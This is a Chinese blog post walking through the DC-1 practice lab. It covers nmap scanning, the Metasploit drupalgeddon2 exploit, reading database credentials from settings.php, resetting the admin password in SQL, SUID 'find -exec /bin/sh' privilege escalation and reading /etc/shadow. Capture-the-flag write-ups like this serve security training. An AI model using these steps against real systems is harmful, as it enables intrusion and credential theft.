【菜鸟打靶日记】

于 2024-04-24 23:41:24 发布
阅读量296 收藏 9
点赞数 4
分类专栏: 打靶 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45997442/article/details/138172793
版权

菜鸟打靶日记+1

dc1靶场笔记

首先把VM和box的网卡设置好,不然扫不到靶机

arp-scan -I eth0 -l (指定网卡扫)

masscan 192.168.184.0/24 -p 80,22( masscan 扫描的网段 -p 扫描端口号)

1.信息收集

  1. msf搜索漏洞

  2. mysql相关查询

find提权

端口扫描,用nmap扫描端口

nmap -A -sV -T4 -p- 靶机ip

-A 全面扫描指定ip或域名的所有端口及其目标系统信息等。所需时间较长

-sV 版本探测 通过相应的端口对应相应的服务,根据服务指纹识别出相应的版本

-T4 快速扫描,常用的扫描方式,前提是需要在网络好的环境中进行扫描

-p 扫描端口号

发现有22和80端口,优先80端口

发现是drupal系统,可以进行漏洞利用

进入msf

msfconsole

搜索drupal的漏洞

search drupal

使用该模块

use exploit/unix/webapp/drupal_drupalgeddon2

查看需要设置的参数

show options

exploit   run

反弹shell run和exploit都可以进行反弹shell

shell  exploit

用本地shell实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

用ls查看目录 里面有flag 用cat查看flag

ls flag.txt

cat flag.txt

flag提示

Every good CMS needs a config file - and so do you.

每一个好的CMS都需要一个配置文件-你也是

查找drupal cms的配置文件

cat sites/default/settings.php

需要登录数据库,直接mysql行不通,进入交互式shell

mysql -udbuser -pR0ck3t

查看数据库

show databases;

使用drupldb这个数据库

use drupaldb;

查看当前数据库的表

show tables;

查看users表内的内容

select * from users;

列出表内指定的数据

select name,pass,mail from users;

找到目录下的脚本

加密字符串

./scripts/password-hash.sh 123456

将原来字符串的密码改成加密的字符串

update users set pass="zhifuchuan" where uid=1;

成功后进行网站登录

找到flag3

提示特殊的PERMS 将帮助查找passwd - 但是您需要-exec 该命令来确定如何获取shadow中的内容。

whoami查看权限发现sudo无命令需要su

使用find / -perm -4000查找系统所有文件中拥有suid特殊权限的文件

使用find提权

find authorze.php -exec '/bin/sh' \;

根据flag3提示去查看showdow获取信息

cat /etc/shadow

寻找最后一个flag

cd /root

ls

Yb9msxx
关注
专栏目录
python网络爬虫之selenium的详细安装配置以及简单使用--菜鸟复习日记
weixin_51459024的博客
09-20 1751
今天主要是说关于selenium库的一些配置,说得比较详细,还有一些简单的操作。
nmap命令使用大全,详细清晰
weixin_73562787的博客
07-18 1万+
一、主机发现 全面扫描/综合扫描 nmap -A 192.168.1.103 Ping 扫描 nmap -sP 192.168.1.1/24 免 Ping 扫描,穿透防火墙,避免被防火墙发现 nmap -P0 192.168.1.103 TCP SYN Ping 扫描 nmap -PS -v 192.168.1.103 nmap -PS80,10-100 -v 192.168.1.103 (针对防火墙丢弃 RST 包) TCP ACK Ping 扫描 nmap -PA -v 192
nmap学习3-查看主机系统指纹和版本侦测
阿祥的博客
12-07 2058
1.远程查看系统指纹 例:namp -F -O 192.168.0.1 -F 进行有限的端口扫描,会加快扫描进度 -O 进行系统指纹的扫描,会有点慢,扫描出的端口所对应的服务不是真实对应的 2.版本侦测 例: nmap -sV -A192.168.0.1 -sV 版本侦测(默认扫描1000个端口) -A 操作系统探测和服务发现 --version -intensity 扫描强度选择,范围1-9(默认强...
nmap基础
qq_38675102的博客
12-31 227
nmap自学笔记-保持更新
Nmap端口探测——识别目标主机的服务和版本(三)
热门推荐
初心的博客
03-28 1万+
知识准备 识别服务的参数 (1)-sV(版本探测) 该参数可打开版本探测。也可以用-A同时打开操作系统探测和版本探测。 (2)- -allpots(不为版本探测排除任何端口) (3)- -version-intensity(设置版本扫描强度) 当进行版本扫描(-sV)时,Nmap发送一系列探测报文,每个报文都被赋予一个1~9的值。默认值为7 (4)- -version-light(打开轻量级模式)...
Nmap常用命令及扫描原理
学生
11-04 1万+
nmap常用命令参数和扫描原理
Python3菜鸟教程离线版20200914(含完整菜鸟教程网页及CHM版文档)
09-15
菜鸟教程网站上的Python3教程还挺详细,想在没有网络的电脑上离线看但是发现网上没有资源,只有老版本的PDF文档,实在不方便阅读,所以自己做了一个,Python3菜鸟教程离线版内部包含20200914保存的完整离线版教程...
菜鸟电子面单接口+js云打印+C#云打印.zip
11-24
菜鸟电子面单,c#对接源码 1.审核通过后可以进行测试 2.首先调用电子面单订购查询接口,查询商家发货地址,及面单信息 3.调用取号接口,进行电子面单取号。 4.根据取号结果调用本地打印机,进行打印。
菜鸟菜鸟商城 菜鸟新闻全套
03-28
# 菜鸟商城 # 是一个仿淘宝客户端的实战课程,功能包括:1.支付(支付宝,微信,百度钱包) 、首页 、热卖 、商品大全 、购物车 、我的 、商品列表 、商品详情 、注册/登录 、收货地址 、我的订单 、我的收藏 ..... ...
菜鸟网络招股书.pdf
11-06
菜鸟网络招股书, 港交所,阿里巴巴,估值,物流,快递
nmap命令小结(二)
daemon的博客
08-21 983
一、服务和版本探测 -sV:进行版本探测 --allports:将扫描全部端口。在默认情况下,nmap不会扫描9100 TCP端口,因为一些打印机简单地打印送到该端口的 任何数据,这回导致数十页HTTP get请求,二进制 SSL会话请求等等被打印出来。 --version-intensity (设置 版本扫描强度) 版本强度的范围在0-9之间,默认的值是7 二、
这是nmap常用的命令列表。。。
Kali与编程
02-16 1512
nmap -A:全面扫描,包含操作系统和服务版本探测等。nmap -sT:TCP connect 扫描。nmap -oN:以一般文本格式输出扫描结果。nmap -oX:以XML格式输出扫描结果。nmap -sS:TCP SYN 扫描。nmap -T:指定扫描速度等级。nmap -vv:显示更详细信息。nmap -sP:扫描主机列表。nmap -sU:UDP 扫描。nmap -O:操作系统探测。nmap -p:指定端口扫描。nmap -v:显示详细信息。nmap -sV:版本扫描。
上帝之眼Nmap简介及命令大全
Filotimo_的博客
09-01 819
本篇文章首先对黑客常用的工具Nmap(上帝之眼)做了一个基本介绍,然后对Nmap的常用命令做了一个很详细的汇总,包括Nmap常用命令的解释说明。
Nmap常用命令
m0_48907714的博客
02-18 8815
Nmap基本命令 包括进阶命令
带你玩转渗透测试靶机Vulnhub-CengBox3
m0_74025111的博客
11-02 226
结果出来了,非常帅呀,今天的主角开了蛮多端口的嘛80,443端口皆是HTTP服务的,所在443端口的Apache2.4.18 为SSL,ceng-company.vm这个是域名,还有我们最熟悉的22端口,但是这个没开启ssh服务呀!使用kali自带的wireshark分析该数据包,由于我的wireshark出现故障了,没有办法给大家演示,你们可以在自己的kali里去复述,我之前做的时候就已经找过密码了,我在这里直接展示出来给大家。我们在url的后面上是有一个cmd的,我们将反弹语句在cmd上执行。
Linux Nmap命令解析(Nmap指令)(功能:主机发现、ping扫描、arp扫描、端口扫描、服务版本检测、操作系统识别等)
最新发布
Dontla的博客
11-28 5080
Nmap(Network Mapper)是一款开源的网络探测和安全审核工具。它设计用于快速扫描大型网络,但也适合对单个主机进行各种检查。Nmap 由 Gordon Lyon(又名 Fyodor)编写,并首次发布于 1997 年。如果确定是在本地网络上,并且知道目标主机可能会响应ARP请求,则使用-PR是合理的。如果-PR报告说主机看起来已经关闭,而怀疑主机实际上是开着的并且可能只是屏蔽了ARP请求,那么你可以尝试使用-Pn来绕过主机发现阶段,直接进行端口扫描。
端口扫描神器 - Nmap的基本使用
hackzkaq的博客
11-19 1万+
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、Nmap简介 Nmap是一款网络扫描和主机检测的非常有用的工具。 可以用于收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。 主要功能有: 检测活在网络上的主机(主机发现) 检测主机上开放的端口(端口发现或枚举) 检测到相应的端口(服务发现)的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(Nmap的脚本) 下载地址:https://nmap.org/download.html (也可文末扫码找助教领取安装
黑客工具之Nmap详细使用教程(扫描器主机、端口、版本、OS、漏洞扫描基本用法)
Cairo_A的博客
11-10 8833
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽;fuzzer:模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞;
Nmap 扫描器的使用技巧
weixin_30390075的博客
08-30 423
1.nmap语法 -A 全面扫描/综合扫描 例如:nmap -A 127.0.0.1 扫描指定段 例如:nmap 127.0.0.1-200&nmap 127.0.0.1/24 2.Nmap 主机发现 -sP -sP ping扫描 例如:nmap -sP 127.0.0.1 -P0 -P0 无ping扫描 备注:【协议1,协议2】【...
Java菜鸟成长记:项目开发经验与技术解析
Java菜鸟成长日记是一系列由作者ysc1123撰写的博客,旨在分享他们在项目开发和工作中积累的Java技术经验,包括但不限于Java基础知识、架构设计、报表开发技巧,以及数据库管理(如Oracle和MySQL)的实践和问题解决。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值